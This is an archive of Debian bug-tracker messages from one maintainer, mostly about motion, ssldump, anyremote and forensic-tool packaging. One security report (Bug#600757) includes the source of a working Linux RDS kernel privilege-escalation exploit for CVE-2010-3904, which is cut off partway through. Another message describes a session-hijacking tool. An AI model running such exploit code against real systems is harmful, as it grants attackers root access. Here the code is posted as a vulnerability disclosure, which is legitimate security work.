Bug#764158: O: metacam -- extract EXIF information from digital camera files

2014-10-05 Thread Juan Angulo Moreno
Package: wnpp
Severity: normal

Thanks you,


-- 
Juan Angulo Moreno


Bug#711196: motion: Crash immediately after start

2013-06-05 Thread Juan Angulo Moreno
Hi Markus,

By default, motion dumps pictures or videos in /tmp/motion (you can change
it in /etc/motion/motion.conf). Please, check that this directory exists
and is writable for user 'motion'.

Regards,


2013/6/5 Markus Glugla markus.glu...@physik.tu-berlin.de

 Package: motion
 Version: 3.2.12-3.4
 Severity: normal

 Dear Maintainer,

 I start motion via /etc/init.d/motion start.

 After a short time the following error message appears in the syslog:
 Jun  5 12:58:24 hostname motion: [0] Not config file to process using
 default values
 [...]
 Jun  5 12:58:24 hostname motion: [1] Resizing pre_capture buffer to 1 items
 Jun  5 12:58:47 hostname motion: [1] Error opening file
 ./01-20130605125847-00.jpg with mode w: Permission denied
 Jun  5 12:58:47 hostname motion: [1] Can't write picture to file
 ./01-20130605125847-00.jpg - check access rights to target directory:
 Permission denied
 Jun  5 12:58:47 hostname motion: [1] Thread is going to finish due to this
 fatal error: Permission denied
 Jun  5 12:58:47 hostname motion: [1] Calling vid_close() from
 motion_cleanup
 Jun  5 12:58:47 hostname motion: [1] Closing video device /dev/video0
 Jun  5 12:58:48 hostname motion: [0] Motion terminating


 Starting motion by hand with motion -c /etc/motion/motion.conf
 everythings works fine. The syslog file contains the following line:
 Jun  5 12:59:57 hostname motion: [0] Processing thread 0 - config file
 /etc/motion/motion.conf

 It sounds like an error in /etc/init.d/motion.

 Thank you,

 Markus Glugla

 -- System Information:
 Debian Release: 7.0
   APT prefers stable-updates
   APT policy: (500, 'stable-updates'), (500, 'stable')
 Architecture: i386 (i686)

 Kernel: Linux 3.2.0-4-686-pae (SMP w/2 CPU cores)
 Locale: LANG=de_DE.utf8, LC_CTYPE=de_DE.utf8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/dash

 Versions of packages motion depends on:
 ii  adduser3.113+nmu3
 ii  debconf [debconf-2.0]  1.5.49
 ii  libavcodec53   6:0.8.6-1
 ii  libavformat53  6:0.8.6-1
 ii  libavutil516:0.8.6-1
 ii  libc6  2.13-38
 ii  libjpeg8   8d-1
 ii  libmysqlclient18   5.5.31+dfsg-0+wheezy1
 ii  libpq5 9.1.9-1

 Versions of packages motion recommends:
 ii  ffmpeg  6:0.8.6-1

 Versions of packages motion suggests:
 pn  mysql-client   none
 pn  postgresql-client  none

 -- Configuration Files:
 /etc/default/motion changed [not included]
 /etc/motion/motion.conf changed [not included]

 -- debconf information:
   motion/moved_conf_dir:




-- 
Juan Angulo Moreno


Bug#610334: ssldump doesn't support TUN interfaces

2011-01-17 Thread Juan Angulo Moreno
Hi,

This patch will be apply in the new ssldump package.

Thanks you!.

2011/1/17 Roland Pallai pall...@magex.hu:
 Package: ssldump
 Version: 0.9b3-4
 Severity: normal
 Tags: patch


 ssldump doesn't support TUN interfaces. I'm using the latest Squeeze version
 on Lenny built from sources.


-- 
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#607977: motion: Using the NTSC video format, Motion goes crasch.

2010-12-26 Thread Juan Angulo Moreno
Hi Dennis,

could you send more info? Please do a dump in debug mode of motion.

Thanks you!

-- 
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#601691: ITP: idiocy -- a warning shot to people browsing the internet insecurely

2010-10-28 Thread Juan Angulo Moreno
Package: wnpp
Severity: normal
Owner: Juan Angulo Moreno j...@apuntale.com
Package name: Idiocy
Version: 0.1
Upstream Author: Jonty Wareing
URL: http://github.com/jonty/idiocy
License: Public Domain
Description: A warning shot to people browsing the internet insecurely.

Idiocy quietly watches for people insecurely visiting twitter on
public wifi networks,
then hijacks their session to post a tweet warning them about the
dangers. It was
written in response to the release of Firesheep, which will result in
a huge increase
in session stealing attacks, with no defence other than forcing people
to use SSL.

-- 
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#600757: linux-2.6: Linux RDS Protocol Local Privilege Escalation

2010-10-19 Thread Juan Angulo Moreno
Package: linux-2.6
Version: 2.6.32-5-686
Severity: critical
Tags: security
Justification: root security hole

There is a security hole in all versions of linux-2.6 distributed by Debian.

The attached exploit code can be used to test if a kernel is vulnerable,
it starts a root shell.

I test it in Debian Squeeze, a screenshot can be found in
http://i56.tinypic.com/2nh19v6.png


-- 
Juan Angulo Moreno
/* 
 * Linux Kernel = 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg drosenb...@vsecurity.com
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include stdio.h
#include unistd.h
#include stdlib.h
#include fcntl.h
#include sys/types.h
#include sys/socket.h
#include netinet/in.h
#include errno.h
#include string.h
#include sys/ptrace.h
#include sys/utsname.h

#define RECVPORT  
#define SENDPORT 

int prep_sock(int port)
{
	
	int s, ret;
	struct sockaddr_in addr;

	s = socket(PF_RDS, SOCK_SEQPACKET, 0);

	if(s  0) {
		printf([*] Could not open socket.\n);
		exit(-1);
	}
	
	memset(addr, 0, sizeof(addr));

	addr.sin_addr.s_addr = inet_addr(127.0.0.1);
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port);

	ret = bind(s, (struct sockaddr *)addr, sizeof(addr));

	if(ret  0) {
		printf([*] Could not bind socket.\n);
		exit(-1);
	}

	return s;

}

void get_message(unsigned long address, int sock)
{

	recvfrom(sock, (void *)address, sizeof(void *), 0,
		 NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
	
	int size, ret;
	struct sockaddr_in recvaddr;
	struct msghdr msg;
	struct iovec iov;
	unsigned long buf;
	
	memset(recvaddr, 0, sizeof(recvaddr));

	size = sizeof(recvaddr);

	recvaddr.sin_port = htons(RECVPORT);
	recvaddr.sin_family = AF_INET;
	recvaddr.sin_addr.s_addr = inet_addr(127.0.0.1);

	memset(msg, 0, sizeof(msg));
	
	msg.msg_name = recvaddr;
	msg.msg_namelen = sizeof(recvaddr);
	msg.msg_iovlen = 1;
	
	buf = value;

	iov.iov_len = sizeof(buf);
	iov.iov_base = buf;

	msg.msg_iov = iov;

	ret = sendmsg(sock, msg, 0);
	if(ret  0) {
		printf([*] Something went wrong sending.\n);
		exit(-1);
	}
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

	if(!fork()) {
			sleep(1);
			send_message(value, sendsock);
			exit(1);
	}
	else {
		get_message(addr, recvsock);
		wait(NULL);
	}

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

	commit_creds(prepare_kernel_cred(0));
	return -1;	

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
	FILE *f;
	unsigned long addr;
	char dummy;
	char sname[512];
	struct utsname ver;
	int ret;
	int rep = 0;
	int oldstyle = 0;

	f = fopen(/proc/kallsyms, r);
	if (f == NULL) {
		f = fopen(/proc/ksyms, r);
		if (f == NULL)
			goto fallback;
		oldstyle = 1;
	}

repeat:
	ret = 0;
	while(ret != EOF) {
		if (!oldstyle)
			ret = fscanf(f, %p %c %s\n, (void **)addr, dummy, sname);
		else {
			ret = fscanf(f, %p %s\n, (void **)addr, sname);
			if (ret == 2) {
char *p;
if (strstr(sname, _O/) || strstr(sname, _S.))
	continue;
p = strrchr(sname, '_');
if (p  ((char *)sname + 5)  !strncmp(p - 3, smp, 3)) {
	p = p - 4;
	while (p  (char *)sname  *(p - 1) == '_')
		p--;
	*p = '\0';
}
			}
		}
		if (ret == 0) {
			fscanf(f, %s\n, sname);
			continue;
		}
		if (!strcmp(name, sname)) {
			fprintf(stdout,  [+] Resolved %s to %p%s\n, name, (void *)addr, rep ?  (via System.map) : );
			fclose(f);
			return addr;
		}
	}

	fclose(f);
	if (rep)
		return 0;
fallback:
	/* didn't find the symbol, let's retry with the System.map
	   dedicated

Bug#600757: Possible Fix

2010-10-19 Thread Juan Angulo Moreno
tag 600757 pending
thanks

It is patch can fix:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f


-- 
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#523932: motion: segfaults when reporting an error

2010-04-14 Thread Juan Angulo Moreno
Hi Steve,

A few days ago is available the latest version of motion in debian
(unstable). Could you try this latest version to see if it continues
this bug?

Thanks,

2009/4/13 Stephen Kitt st...@sk2.org:
 Package: motion
 Version: 3.2.11-1.1
 Severity: important
 Tags: patch


 Hi,

 motion segfaults in motion_log() when it calls strerror_r(); apparently
 nowadays the default strerror_r() is the POSIX version, so coding for the
 GNU version fails.

 The attached patch fixes this.

 Regards,

 Stephen

 -- System Information:
 Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable'), (200, 'unstable'), (1, 
 'experimental')
 Architecture: i386 (i686)

 Kernel: Linux 2.6.26-2-686 (SMP w/2 CPU cores)
 Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/dash

 Versions of packages motion depends on:
 ii  adduser                3.110             add and remove users and groups
 ii  debconf [debconf-2.0]  1.5.26            Debian configuration management 
 sy
 ii  libavcodec52           3:0.svn20090303-1 ffmpeg codec library
 ii  libavformat52          3:0.svn20090303-1 ffmpeg file format library
 ii  libavutil49            3:0.svn20090303-1 ffmpeg utility library
 ii  libc6                  2.9-4             GNU C Library: Shared libraries
 ii  libjpeg62              6b-14             The Independent JPEG Group's JPEG
 ii  libmysqlclient15off    5.0.51a-24        MySQL database client library
 ii  libpq5                 8.3.7-1           PostgreSQL C client library

 Versions of packages motion recommends:
 ii  ffmpeg                 3:0.svn20090303-1 multimedia player, server and 
 enco

 Versions of packages motion suggests:
 ii  mysql-client-5.0 [mysql-clien 5.0.51a-24 MySQL database client binaries
 pn  postgresql-client             none     (no description available)

 -- debconf information:
  motion/moved_conf_dir:




-- 
Juan Angulo Moreno



--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#550689: motion randomly segfaults

2010-04-14 Thread Juan Angulo Moreno
Hi Folkert,

A few days ago is available the latest version of motion in debian
(unstable). Could you try this latest version to see if it continues
this bug?

Thanks,

2009/10/12 Folkert van Heusden folk...@vanheusden.com:
 Package: motion
 Version: 3.2.9-7
 Severity: normal


 Frequently (once a day on average) motion segfaults and then exits.

 Oct 12 10:55:51 mauer kernel: [1017605.994066] motion[30318]: segfault at 65 
 ip 00364ce18657 sp 7fb42075f670 error 4 in 
 libavformat.so.52.32.0[364ce0+9f000]


 -- System Information:
 Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (500, 'testing')
 Architecture: amd64 (x86_64)

 Kernel: Linux 2.6.29-pps (SMP w/4 CPU cores)
 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
 Shell: /bin/sh linked to /bin/bash

 Versions of packages motion depends on:
 ii  adduser          3.110                   add and remove users and groups
 ii  debconf [debconf 1.5.27                  Debian configuration management 
 sy
 ii  libavcodec51     0.svn20080206-17+lenny1 ffmpeg codec library
 ii  libavformat52    4:0.5.svn20090330-0.0   ffmpeg file format library
 ii  libavutil49      4:0.5+svn20090706-2     ffmpeg utility library
 ii  libc6            2.9-12                  GNU C Library: Shared libraries
 ii  libjpeg62        6b-15                   The Independent JPEG Group's JPEG
 ii  libmysqlclient15 5.0.51a-24+lenny2       MySQL database client library
 ii  libpq5           8.4.0-2                 PostgreSQL C client library

 Versions of packages motion recommends:
 ii  ffmpeg             4:0.5.svn20090330-0.0 audio/video encoder, streaming 
 ser

 Versions of packages motion suggests:
 ii  mysql-client                  5.0.51a-24 MySQL database client 
 (metapackage
 ii  mysql-client-5.0 [mysql-clien 5.0.51a-24 MySQL database client binaries
 ii  postgresql-client-8.3 [postgr 8.3.8-1    front-end programs for PostgreSQL

 -- debconf information:
  motion/moved_conf_dir:






-- 
Juan Angulo Moreno



--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#517568: Waiting for sponsorship

2009-07-14 Thread Juan Angulo Moreno
Hi,

I have uploaded the package to mentors.debian.net
(http://mentors.debian.net/debian/pool/main/m/motion/motion_3.2.11-2.dsc)
and currently waiting for sponsorship.


-- 
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#532575: lsat: Hardcoded number of accounts too low

2009-06-10 Thread Juan Angulo Moreno
Hi,

Thanks for you contributtion. The next release included this patch.

Thanks again,

2009/6/11 TomaszN nowak2...@poczta.onet.pl:
 Package: lsat
 Version: 0.9.7.1-1
 Severity: normal
 Tags: patch


 LSAT's checkftpusers module hardcodes max number of users to check in many 
 places. The amount (100) is too low for servers. I include a patch that 
 extracts the value to a #defined constant, and set to 4000.



-- 
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#513093: New version of motion available - please upgrade !

2009-01-26 Thread Juan Angulo Moreno
Sorry Jan, is avaliable in
http://mentors.debian.net/debian/pool/main/m/motion/ and waiting for
sponsor.


Jan Prunk escribió:
 Package: motion
 Version: 3.2.9-7
 Severity: wishlist
 
 There is a new version (3.2.11) of Motion available at:
 http://www.lavrsen.dk/twiki/bin/view/Motion/WebHome
 
 please update !
 
 Regards, 
 Jan
 
 -- System Information:
 Debian Release: 5.0
   APT prefers testing
   APT policy: (500, 'testing')
 Architecture: i386 (i686)
 
 Kernel: Linux 2.6.26-1-686 (SMP w/2 CPU cores)
 Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/bash
 
 Versions of packages motion depends on:
 ii  adduser   3.110  add and remove users and groups
 ii  debconf [debconf-2.0] 1.5.24 Debian configuration management 
 sy
 ii  libavcodec51  3:20080706-0.3 library to encode decode 
 multimedi
 ii  libavformat52 3:20080706-0.3 ffmpeg file format library
 ii  libavutil49   3:20080706-0.3 avutil shared libraries
 ii  libc6 2.7-18 GNU C Library: Shared libraries
 ii  libjpeg62 6b-14  The Independent JPEG Group's 
 JPEG 
 ii  libmysqlclient15off   5.0.51a-21 MySQL database client library
 ii  libpq58.3.5-1PostgreSQL C client library
 
 Versions of packages motion recommends:
 ii  ffmpeg3:20080706-0.3 audio/video encoder, streaming 
 ser
 
 Versions of packages motion suggests:
 ii  mysql-client-5.0 [mysql-clien 5.0.51a-21 MySQL database client binaries
 pn  postgresql-client none (no description available)
 
 -- debconf information:
   motion/moved_conf_dir:
 
 


-- 
Juan Angulo Moreno
http://www.0x29.com.ve



--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#512483: ITP: fatback -- A tool for recovering files from FAT file systems

2009-01-20 Thread Juan Angulo Moreno
Package: wnpp
Severity: normal
Owner: Debian Forensics forensics-de...@lists.alioth.debian.org

   Package name: fatback
Version: 1.3
Upstream Author: Nicholas Harbour
URL: http://fatback.sourceforge.net/
License: GPL2
Description: A tool for recovering files from FAT file systems

Fatback is a forensic tool for undeleting files from Microsoft FAT file
systems.

-- 
Juan Angulo Moreno
http://www.0x29.com.ve



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#512208: ITP: safecopy -- A data recovery tool

2009-01-18 Thread Juan Angulo Moreno
Package: wnpp
Severity: normal
Owner: Debian Forensics forensics-de...@lists.alioth.debian.org

   Package name: safecopy
Version: 0.2
Upstream Author: Corvus Corax
URL: http://safecopy.sourceforge.net/
License: GPL2
Description: A data recovery tool

Safecopy is a data recovery tool which tries to extract as much data as
possible from a seekable, but problematic (i.e. damaged sectors)
source - like floppy drives, harddisk partitions, CDs, ..., where
other tools like dd would fail doe to I/O errors.

-- 
Juan Angulo Moreno
http://www.0x29.com.ve



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#512125: ITP: shed -- A simple hex editor with a pico-style interface

2009-01-17 Thread Juan Angulo Moreno
Package: wnpp
Severity: normal
Owner: Debian Forensics forensics-de...@lists.alioth.debian.org

   Package name: shed
Version: 1.14
Upstream Author: Alex Sisson
URL: http://sourceforge.net/projects/shed/
License: GPL
Description: A simple hex editor with a pico-style interface

Shed is a easy application for viewing and editing files in hex, octal,
binary, or ascii text using ncurses, with a friendly pico-style interface.


-- 
Juan Angulo Moreno
http://www.0x29.com.ve



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#497841: php-cgi zombie is when it stops cherokee

2008-09-04 Thread Juan Angulo Moreno
Package: cherokee
Version: 0.7.2-3
Severity: important

Hi,

I found that when I stop cherokee daemon php-cgi remains zombie:

camila:~# invoke-rc.d cherokee stop
Stopping web server: cherokee .
camila:~# ps aux | grep cherokee
root  9386  0.0  0.2   4724   732 pts/2R+   14:27   0:00 grep cherokee
camila:~# ps aux | grep php
www-data  9010  0.0  1.4  24560  5064 ?Ss   13:59   0:00 php-cgi -b 1234
www-data  9012  0.0  1.0  24560  3652 ?S13:59   0:00 php-cgi -b 1234
www-data  9013  0.0  0.7  24560  2720 ?S13:59   0:00 php-cgi -b 1234
www-data  9014  0.0  0.7  24560  2720 ?S13:59   0:00 php-cgi -b 1234
www-data  9015  0.0  0.7  24560  2728 ?S13:59   0:00 php-cgi -b 1234
www-data  9016  0.0  0.5  24560  1924 ?S13:59   0:00 php-cgi -b 1234
root  9388  0.0  0.2   4724   740 pts/2S+   14:27   0:00 grep php

By making changes in /etc/php5/* not take them and must be manually
kill processes php-cgi
and restart the cherokee to take effect.

Info:
php5-cli: 5.2.6-3
cherokee: 0.7.2-3

Greets,

--
Juan Angulo Moreno



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#487132: I Intend to Adopt ssldump

2008-08-28 Thread Juan Angulo Moreno
retitle 487132 ITA: ssldump -- An SSLv3/TLS network protocol analyzer
owner 487132 !
thanks

--
Juan Angulo Moreno
http://0x29.com.ve




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#490018: anyremote: new upstream release available

2008-07-09 Thread Juan Angulo Moreno
Hi,

anyRemote is ready[0] but I am awaiting that my sponsor upload this to
Debian.

[0] http://mentors.debian.net/debian/pool/main/a/anyremote/

 Package: anyremote
 Version: 4.2-1
 Severity: important


 The current version of anyremote in unstable is 4.2, while on
 http://sourceforge.net/project/showfiles.php?group_id=162923package_id=184044
 already 4.6 is available.

 I chose severity important because = 4.4 is needed for me to upload
 kanyremote and ganyremote, frontends of anyremote for kde and gnome.

 So this bug is blocking #486546 and #483679.

 Regards,
 Philipp





--
Juan Angulo Moreno
http://www.0x29.com.ve




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#483679: (g-/k-)anyremote for Debian

2008-06-29 Thread Juan Angulo Moreno

Hi,

anyRemote is ready[0] but I am awaiting that my sponsor upload this to 
Debian.


[0] http://mentors.debian.net/debian/pool/main/a/anyremote/


Philipp Hübner escribió:

Hey,
I've got gAnyRemote and kAnyRemote packaged now,
but both need anyremote (= 4.4) to work, so I couldn't test them yet.

I'd be glad if you could updated anyRemote soon.

Thanks,
Philipp

PS: please keep the CC when replying.





--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#484566: Bug#484572: [motion] off-by-one in webhttpd.c

2008-06-10 Thread Juan Angulo Moreno

Hi,

Since the bugs were repaired[1]. Please do tests.

Thank you.


[1] http://0x29.com.ve/debian/motion/motion_3.2.9-4.dsc

--
Juan Angulo Moreno


Nico Golde escribió:

Hi,
comments on the exploitability are welcome, see:
http://www.openwall.com/lists/oss-security/2008/06/10/1

Cheers
Nico

  





--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#482231: motion: FTBFS: checking size of short int... configure: error: cannot compute sizeof (short int)

2008-05-28 Thread Juan Angulo Moreno
Hi Lucas,

Y build motion 3.2.9-2 in amd64 node with Sid and   
they built successfully. You can see the log here:

http://0x29.com.ve/debian/motion/logs/00_checking_size_of_short_int.txt

I use Gcc 4.3:

[EMAIL PROTECTED]:~/pkgs/motion/tmp/motion-3.2.9$ x86_64-linux-gnu-gcc -v
Usando especificaciones internas.
Objetivo: x86_64-linux-gnu
Configurado con: ../src/configure -v --with-pkgversion='Debian 4.3.0-5'
--with-bugurl=file:///usr/share/doc/gcc-4.3/README.Bugs
--enable-languages=c,c++,fortran,objc,obj-c++ --prefix=/usr
--enable-shared --with-system-zlib --libexecdir=/usr/lib
--without-included-gettext
--enable-threads=posix --enable-nls
--with-gxx-include-dir=/usr/include/c++/4.3 --program-suffix=-4.3
--enable-clocale=gnu --enable-libstdcxx-debug
--enable-objc-gc --enable-mpfr --enable-cld --enable-checking=release
--build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Modelo de hilos: posix
gcc versión 4.3.1 20080523 (prerelease) (Debian 4.3.0-5)


Lucas Nussbaum escribió:
 Package: motion
 Version: 3.2.9-2
 Severity: serious
 User: [EMAIL PROTECTED]
 Usertags: qa-ftbfs-20080520 qa-ftbfs
 Justification: FTBFS on i386
 
 Hi,
 
 During a rebuild of all packages in sid, your package failed to build on
 i386.
 
 This rebuild was done with gcc 4.3 instead of gcc 4.2, because gcc 4.3
 is now the default on most architectures (even if it's not the case on
 i386 yet).  Consequently, many failures are caused by the switch to gcc
 4.3.
 If you determine that this failure is caused by gcc 4.3, feel free to
 downgrade this bug to 'important' if your package is only built on i386,
 and this bug is specific to gcc 4.3 (i.e the package builds fine with
 gcc 4.2).
 
 Relevant part:
  /usr/bin/fakeroot debian/rules clean
 dh_testdir
 dh_testroot
 rm -f build-stamp configure-stamp
 [ ! -f Makefile ] || /usr/bin/make distclean
 rm -f config.{sub,guess,log,status}
 dh_clean 
  dpkg-source -b motion-3.2.9
 dpkg-source: info: using source format `1.0'
 dpkg-source: info: building motion using existing motion_3.2.9.orig.tar.gz
 dpkg-source: info: building motion in motion_3.2.9-2.diff.gz
 dpkg-source: info: building motion in motion_3.2.9-2.dsc
  debian/rules build
 dh_testdir
 cp -f /usr/share/misc/config.guess config.guess
 cp -f /usr/share/misc/config.sub config.sub
 # Add here commands to configure the package.
 CFLAGS=-Wall -g -O2 LDFLAGS=-Wl,--as-needed ./configure \
  --prefix=/usr \
  --bindir=\${prefix}/bin \
  --build=i486-linux-gnu \
  --host=i486-linux-gnu \
  --datadir=\${prefix}/share \
  --mandir=\${datadir}/man \
  --infodir=\${datadir}/info \
  --sysconfdir=/etc/motion \
  --with-ffmpeg \
  --with-mysql \
  --with-pgsql \
  --without-optimizecpu \
  --without-jpeg-mmx
 checking for Darwin... no
 checking for *BSD... no
 checking for i486-linux-gnu-gcc... i486-linux-gnu-gcc
 checking for C compiler default output file name... a.out
 checking whether the C compiler works... yes
 checking whether we are cross compiling... no
 checking for suffix of executables... 
 checking for suffix of object files... o
 checking whether we are using the GNU C compiler... yes
 checking whether i486-linux-gnu-gcc accepts -g... yes
 checking for i486-linux-gnu-gcc option to accept ISO C89... none needed
 checking for pthread_create in -lpthread... yes
 checking for libjpeg-mmx... skipping
 checking for jpeg_set_defaults in -ljpeg... yes
 checking how to run the C preprocessor... i486-linux-gnu-gcc -E
 checking for grep that handles long lines and -e... /bin/grep
 checking for egrep... /bin/grep -E
 checking for ANSI C header files... yes
 checking for sys/types.h... yes
 checking for sys/stat.h... yes
 checking for stdlib.h... yes
 checking for string.h... yes
 checking for memory.h... yes
 checking for strings.h... yes
 checking for inttypes.h... yes
 checking for stdint.h... yes
 checking for unistd.h... yes
 checking mjpegtools/jpegutils.h usability... no
 checking mjpegtools/jpegutils.h presence... no
 checking for mjpegtools/jpegutils.h... no
 checking mjpegtools/mjpeg_types.h usability... no
 checking mjpegtools/mjpeg_types.h presence... no
 checking for mjpegtools/mjpeg_types.h... no
 checking mjpegtools... no
 checking for ffmpeg autodetecting... found for debian
 checking for ffmpeg headers... found for debian
 checking file_protocol is defined in ffmpeg ?... no
 checking for mysql support... testing
 checking autodect mysql headers... yes
 checking autodect mysql libs... found
 checking for PostgreSQL... yes
 checking for PQcmdTuples in -lpq... no
 checking for PQoidValue in -lpq... no
 checking for PQclientEncoding in -lpq... no
 checking for pg_encoding_to_char in -lpq... no
 checking for ANSI C header files... (cached) yes
 checking stdio.h usability... yes
 checking stdio.h presence... yes
 

Bug#481889: Man page for sarg-reports

2008-05-19 Thread Juan Angulo Moreno

Package: sarg
Tags: patch



.\  Hey, EMACS: -*- nroff -*-
.\ First parameter, NAME, should be all caps
.\ Second parameter, SECTION, should be 1-8, maybe w/ subsection
.\ other parameters are allowed: see man(7), man(1)
.TH SARG-REPORTS 1 may 17, 2008
.\ Please adjust this date whenever revising the manpage.
.\
.\ Some roff macros, for reference:
.\ .nhdisable hyphenation
.\ .hyenable hyphenation
.\ .ad l  left justify
.\ .ad b  justify to both left and right margins
.\ .nfdisable filling
.\ .fienable filling
.\ .brinsert line break
.\ .sp ninsert n+1 empty lines
.\ for manpage-specific macros, see man(7)
.SH NAME
sarg-reports \- Daily/Weekly/Monthly squid usage reports creation tool
.SH SYNOPSIS
.B sarg-reports
.RB [OPTIONS]
.SH DESCRIPTION
This manual page documents briefly the
.B sarg-reports
command.
.PP
.\ TeX users may be more comfortable with the \fBwhatever\fP and
.\ \fIwhatever\fP escape sequences to invode bold face and italics, 
.\ respectively.
\fBsarg-reports\fP is a script written to automate the SARG (a powerful
squid log analyzer) reports and log management.
Sarg it self, provide to end user a generic interface to create
reports based on squid access log (begin of log to current date).
sarg-reports is useful because it allow you to easly create and manage
Daily, Weekly and Monthly reports.
.SH OPTIONS
A summary of options is included below.
.TP
.B manual
.br 
Create Manual report
.TP
.B today
Create Today report
.TP
.B daily
Create Daily report
.TP
.B weekly
Create Weely report
.TP
.B monthly
Create Monthly report
.SH CRONTAB
If you want the reports can be generated automatically insert the 
following lines (the today report creation time depend mostly of 
your sarg server load average, tune it):
.PP
.br
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
.br
00 08-18/1 * * * sarg-reports today
.br
00 00  * * * sarg-reports daily
.br
00 01  * * 1 sarg-reports weekly 
.br
30 02  1 * * sarg-reports monthly
.br
.PP
REMEMBER: if you use logrotate, configure it to rotate the logs within 
MONTHLY basis, AFTER sarg-reports created the monthly html report.
.SH VARIABLES
Check before using the sarg-reports that the following variables are set 
to file /etc/sarg/sarg.conf
.TP
.B SARG
.br 
The sarg executable location
.TP
.B CONFIG
.br 
The sarg main configuration file location
.TP
.B HTMLOUT
.br 
Location where will be saved the reports
.TP
.B PAGETITLE
.br 
The title of main index page
.TP
.B LOGOIMG
.br 
Image logo to view in main index page
.TP
.B LOGOLINK
.br 
HTTP web page link of logo
.TP
.B DAILY
.br 
Word 'daily' translation, translate it to your language
.TP
.B WEEKLY
.br 
Word 'weekly' translation, translate it to your language
.TP
.B MONTHLY
.br 
Word 'monthly' translation, translate it to your language
.TP
.B EXCLUDELOG1
.br 
Exclude text from cron emails (normally, sarg, during cron activity,
if it don't find any valid records,
.TP
.B EXCLUDELOG2
.br 
It will output an error message (usually on 'today' reports). I 
don't want to be warned by email about this, so, i wrote the 'text' 
that will be never logged. This is useful to receive email of real
problems only.
.SH AUTHOR
sarg-reports was written by Ugo Viti [EMAIL PROTECTED]
.PP
This manual page was written by Juan Angulo Moreno [EMAIL PROTECTED],
